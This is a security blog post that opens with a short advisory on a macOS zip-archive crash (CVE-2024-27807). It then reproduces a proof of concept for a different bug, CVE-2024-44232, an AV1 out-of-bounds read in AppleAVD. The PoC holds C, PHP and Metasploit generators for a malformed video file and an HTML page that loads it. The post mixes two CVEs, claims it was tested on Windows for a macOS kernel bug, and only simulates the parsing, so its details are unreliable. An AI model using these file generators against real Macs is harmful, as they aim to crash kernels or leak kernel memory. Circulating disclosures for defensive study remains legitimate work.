Latest Tech

Latest Posts

macOS Sonoma 14.5 Denial of Service

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 132
macOS Sonoma 14.5 Denial of Service
macOS Sonoma 14.5 Denial of Service
macOS Sonoma 14.5 (and earlier versions) contained a Denial of macOS Sonoma 14.5 (and earlier versions) contained a Denial of Service (DoS) vulnerability, identified as CVE-2024-27807.

This flaw was triggered by specially crafted `.zip` archives. Specifically, a `.zip` file containing an excessively long file path within its `__MACOSX` directory could cause a system crash.

When macOS tried to process such a malformed archive, it led to a kernel panic, effectively freezing or restarting the affected Mac. This local DoS vulnerability was reported by Wojciech Regu?a ("illusionofchaos").

Apple addressed the issue with the release of macOS Sonoma 14.6, macOS Ventura 13.6.7, and macOS Monterey 12.7.5. Users were advised to update promptly to mitigate the risk.

=============================================================================================================================================
| # Title : macOS Sonoma 14.5 potential kernel crash |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : System built?in component. No standalone download available. |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/202851/ & CVE-2024-44232

[+] Summary :

The vulnerability resides in the AV1_Syntax::Parse_Header function, where the size of AV1 OBUs (Open Bitstream Units) is parsed incorrectly.
Due to insufficient validation of OBU sizes, a specially crafted AV1 video file can cause the parser to compute an excessively large size value. When this malformed size is later used during parsing, it can trigger an Out-of-Bounds Read.
This flaw is tracked as CVE-2024-44232, a critical out-of-bounds read vulnerability in Apple?s hardware-accelerated AppleAVD AV1 decoding kernel extension.
The issue affects macOS systems equipped with hardware AV1 decoder support.

[+] Discovered by Google Project Zero, the vulnerability may lead to:

Kernel memory disclosure, or Kernel crashes (DoS)
simply by processing a malicious AV1 video file.


[+] POC :

for php : php poc.php

Makefile for C PoC
makefile

# Makefile for CVE-2024-44232 PoC
CC = gcc
CFLAGS = -Wall -Wextra -std=c99
TARGET = av1_poc
SRC = av1_poc.c

all: $(TARGET)

$(TARGET): $(SRC)
$(CC) $(CFLAGS) -o $(TARGET) $(SRC)

clean:
rm -f $(TARGET) *.av1

test: $(TARGET)
./$(TARGET)

.PHONY: all clean test

? Compilation and Usage
For C Version:
bash

gcc -Wall -o av1_poc av1_poc.c
./av1_poc

************************
C Language PoC :
************************

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

// Basic OBU structure
typedef struct {
uint8_t type;
uint8_t extension_flag;
uint8_t has_size;
uint64_t size;
} obu_header_t;

// Create malformed AV1 with oversized OBU
void create_malformed_av1(uint8_t **buffer, size_t *size) {
// AV1 basic signature
uint8_t av1_signature[] = {0x81, 0x00, 0x00, 0x00};

// OBU with extremely large size
obu_header_t obu;
obu.type = 0x0F; // Unknown/Padding type (triggers vulnerable path)
obu.extension_flag = 0x00;
obu.has_size = 0x01;
obu.size = 0xFFFFFFFFFFFFFFFF; // Maximum size

// Calculate total size
size_t header_size = sizeof(av1_signature);
size_t obu_size = 4 + 8; // OBU header + encoded OBU size
*size = header_size + obu_size;

// Allocate memory
*buffer = (uint8_t*)malloc(*size);
if (!*buffer) {
printf("Memory allocation failed\n");
return;
}

// Copy signature
memcpy(*buffer, av1_signature, sizeof(av1_signature));

// Build OBU header
uint8_t *ptr = *buffer + header_size;

// Type and extension field
*ptr++ = (obu.type << 3) | (obu.extension_flag << 2) | (obu.has_size << 1);

// Encoded OBU size (LEB128) - very large size
uint8_t leb128[] = {
0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0x7F // Stop byte
};
memcpy(ptr, leb128, sizeof(leb128));
ptr += sizeof(leb128);

printf("Malformed AV1 file created:\n");
printf("- Total size: %zu bytes\n", *size);
printf("- OBU type: 0x%02X (Unknown)\n", obu.type);
printf("- OBU size: %llu (extremely large)\n", obu.size);
}

// Simulate vulnerable OBU parsing
void simulate_obu_parsing(const uint8_t *data, size_t data_size) {
printf("\nSimulating OBU parsing...\n");

const uint8_t *ptr = data + 4; // Skip AV1 signature
const uint8_t *end = data + data_size;

if (ptr >= end) {
printf("Insufficient data\n");
return;
}

// Read OBU header
uint8_t obu_header = *ptr++;
uint8_t obu_type = (obu_header >> 3) & 0x1F;
uint8_t extension_flag = (obu_header >> 2) & 0x1;
uint8_t has_size = (obu_header >> 1) & 0x1;

printf("OBU Header:\n");
printf("- Type: 0x%02X\n", obu_type);
printf("- Extension flag: %d\n", extension_flag);
printf("- Has size: %d\n", has_size);

if (!has_size) {
printf("No OBU size field\n");
return;
}

// Simulate reading OBU size (vulnerable code)
uint64_t obu_size = 0;
int shift = 0;
int bytes_read = 0;
int max_bytes = 8;

printf("Reading OBU size (LEB128):\n");

while (bytes_read < max_bytes) {
if (ptr >= end) {
printf("End of data while reading size\n");
break;
}

uint8_t byte = *ptr++;
bytes_read++;

obu_size |= (uint64_t)(byte & 0x7F) << shift;
printf(" Byte %d: 0x%02X, Current size: %llu\n",
bytes_read, byte, obu_size);

if ((byte & 0x80) == 0) {
break;
}

shift += 7;
if (bytes_read == max_bytes) {
printf(" Reached max bytes\n");
break;
}
}

printf("Final OBU size: %llu\n", obu_size);
printf("Remaining buffer bytes: %ld\n", end - ptr);

// Simulate the vulnerable out-of-bounds read
if (obu_type == 0x0F) { // Unknown/Padding type
printf("\nTriggering unknown OBU path...\n");

// This simulates the vulnerable code:
// while ( v31 + v83 )
// {
// if ( v8[v36 - 1 + v31 + v37 + v22 + v83--] )

size_t remaining_data = end - ptr;
if (obu_size > remaining_data) {
printf("? POTENTIAL OUT-OF-BOUNDS READ!\n");
printf("? OBU requests %llu bytes but only %zu bytes available\n",
obu_size, remaining_data);
printf("? Difference: %lld bytes beyond bounds\n",
obu_size - remaining_data);
} else {
printf("Sufficient data for OBU\n");
}
}
}

// Main test cycle
int main() {
printf("=== CVE-2024-44232 PoC - AppleAVD OOB Read ===\n");
printf("Out-of-bounds read in AV1 decoding\n\n");

uint8_t *malformed_av1 = NULL;
size_t file_size = 0;

// Create malformed AV1 file
create_malformed_av1(&malformed_av1, &file_size);

if (malformed_av1) {
// Simulate vulnerable processing
simulate_obu_parsing(malformed_av1, file_size);

// Cleanup
free(malformed_av1);
}

printf("\n=== Test completed ===\n");
return 0;
}

-********************
PHP PoC
-**/*/*/*/*/*/*/*/*/*/

<?php
/**
* CVE-2024-44232 PoC - AppleAVD Out-of-Bounds Read
* PHP malformed AV1 file generator
* by indoushka
*/

class AV1MalformedGenerator {

private $debug = true;

public function log($message) {
if ($this->debug) {
echo "[INFO] " . $message . "\n";
}
}

public function generateMalformedAV1() {
$this->log("Generating malformed AV1 file for CVE-2024-44232");

// AV1 signature
$av1_signature = "\x81\x00\x00\x00";

// Create OBU with huge size
$obu_header = $this->createObuHeader(0x0F, false, true); // Unknown type

// Create oversized LEB128
$leb128_size = $this->createLargeLeb128(0x7FFFFFFFFFFFFFFF);

// Build the data
$malformed_data = $av1_signature . $obu_header . $leb128_size;

$this->log("Malformed data generated:");
$this->log(" - Total size: " . strlen($malformed_data) . " bytes");
$this->log(" - OBU type: 0x0F (Unknown)");
$this->log(" - OBU size: extremely large");

return $malformed_data;
}

private function createObuHeader($type, $extension_flag, $has_size) {
$header = ($type << 3) | ($extension_flag << 2) | ($has_size << 1);
return chr($header);
}

private function createLargeLeb128($size) {
$leb128 = "";
$value = $size;

do {
$byte = $value & 0x7F;
$value >>= 7;

if ($value != 0) {
$byte |= 0x80;
}

$leb128 .= chr($byte);
} while ($value != 0);

// Add extra bytes to make size huge
while (strlen($leb128) < 10) {
$leb128 .= chr(0xFF);
}
$leb128 .= chr(0x7F); // Stop byte

$this->log("Created LEB128 size: " . strlen($leb128) . " bytes");

return $leb128;
}

public function saveToFile($filename = "malformed.av1") {
$data = $this->generateMalformedAV1();

if (file_put_contents($filename, $data)) {
$this->log("File saved as: " . $filename);
$this->analyzeFile($filename);
return true;
} else {
$this->log("Failed to save file");
return false;
}
}

private function analyzeFile($filename) {
$data = file_get_contents($filename);
$this->log("\nFile analysis:");
$this->log("Size: " . strlen($data) . " bytes");
$this->log("First bytes: " . bin2hex(substr($data, 0, 16)));

// Simulate vulnerable parsing
$this->simulateVulnerableParsing($data);
}

private function simulateVulnerableParsing($data) {
$this->log("\nSimulating vulnerable parsing:");

if (strlen($data) < 5) {
$this->log("Insufficient data");
return;
}

$ptr = 4; // Skip signature
$obu_header = ord($data[$ptr++]);

$type = ($obu_header >> 3) & 0x1F;
$has_size = ($obu_header >> 1) & 0x1;

$this->log("OBU header: 0x" . dechex($obu_header));
$this->log("Type: 0x" . dechex($type));
$this->log("Has size: " . $has_size);

if ($has_size) {
$obu_size = 0;
$shift = 0;
$bytes_read = 0;

while ($bytes_read < 10 && $ptr < strlen($data)) {
$byte = ord($data[$ptr++]);
$bytes_read++;

$obu_size |= ($byte & 0x7F) << $shift;

if (($byte & 0x80) == 0) {
break;
}

$shift += 7;
}

$this->log("Parsed size: " . $obu_size);
$this->log("Remaining bytes: " . (strlen($data) - $ptr));

if ($obu_size > (strlen($data) - $ptr)) {
$this->log("?? POTENTIAL OUT-OF-BOUNDS READ!");
$this->log("?? Requested: " . $obu_size . " bytes");
$this->log("?? Available: " . (strlen($data) - $ptr) . " bytes");
}
}
}
}

// Usage
if (php_sapi_name() === 'cli') {
$generator = new AV1MalformedGenerator();

if (isset($argv[1])) {
$filename = $argv[1];
} else {
$filename = "cve_2024_44232_poc.av1";
}

$generator->saveToFile($filename);

echo "\n=== Test file generated ===\n";
echo "Use this file to test the vulnerability on macOS systems\n";
echo "with AppleAVD extension and hardware AV1 decoder support\n";
}
?>

***********************
Metasploit Module
***********************
##
# Metasploit module for CVE-2024-44232
##

require 'msf/core'

class MetasploitModule < Msf::Auxiliary

include Msf::Exploit::FILEFORMAT

def initialize(info = {})
super(update_info(info,
'Name' => 'AppleAVD AV1 OBU Out-of-Bounds Read',
'Description' => %q{
This module generates a malformed AV1 file that triggers
an out-of-bounds read in AppleAVD kernel extension.
CVE-2024-44232.
},
'Author' => ['indoushka'],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2024-44232'],
['URL', 'https://googleprojectzero.blogspot.com/']
],
'DisclosureDate' => '2024-07-24'
))

register_options([
OptString.new('FILENAME', [true, 'The output filename', 'malformed.av1'])
])
end

def run
# AV1 signature
av1_signature = "\x81\x00\x00\x00"

# OBU header with unknown type
obu_header = create_obu_header(0x0F, false, true)

# Large LEB128 size
leb128_size = create_large_leb128(0x7FFFFFFFFFFFFFFF)

# Build the file
malformed_data = av1_signature + obu_header + leb128_size

print_status("Creating malformed AV1 file...")
print_status("Total size: #{malformed_data.length} bytes")
print_status("OBU type: 0x0F (Unknown)")
print_status("Large OBU size to trigger OOB read")

file_create(malformed_data)
print_good("Malformed AV1 file created: #{datastore['FILENAME']}")
end

def create_obu_header(type, extension_flag, has_size)
header = (type << 3) | (extension_flag ? 1 << 2 : 0) | (has_size ? 1 << 1 : 0)
[header].pack('C')
end

def create_large_leb128(size)
leb128 = ""
value = size

begin
byte = value & 0x7F
value >>= 7

if value != 0
byte |= 0x80
end

leb128 << [byte].pack('C')
end while value != 0

# Make the size larger
while leb128.length < 10
leb128 << "\xFF"
end
leb128 << "\x7F"

leb128
end
end

**************************
HTML Test Page
////////*****************
<!DOCTYPE html>
<html>
<head>
<title>CVE-2024-44232 Test</title>
</head>
<body>
<h1>indoushka-AppleAVD Vulnerability Test Page</h1>

<video id="testVideo" width="320" height="240" controls>
<source src="malformed.av1" type="video/av1">
Browser does not support AV1.
</video>

<script>
// Try to load the malformed video
const video = document.getElementById('testVideo');

video.addEventListener('error', function(e) {
console.log('Video loading error:', e);
document.getElementById('status').innerHTML =
'Error detected - vulnerability may have been triggered';
});

video.addEventListener('load', function(e) {
document.getElementById('status').innerHTML =
'Video loaded successfully';
});
</script>

<div id="status">Preparing...</div>
<div id="info">
<p>This is a test for CVE-2024-44232 in AppleAVD</p>
<p>On macOS systems with hardware AV1 decoder support</p>
</div>
</body>
</html>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

Information Security

Social Media Share
About Contact Terms of Use Privacy Policy
© Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸
All content is for educational purposes only. Unauthorized use of any information on this site is strictly prohibited.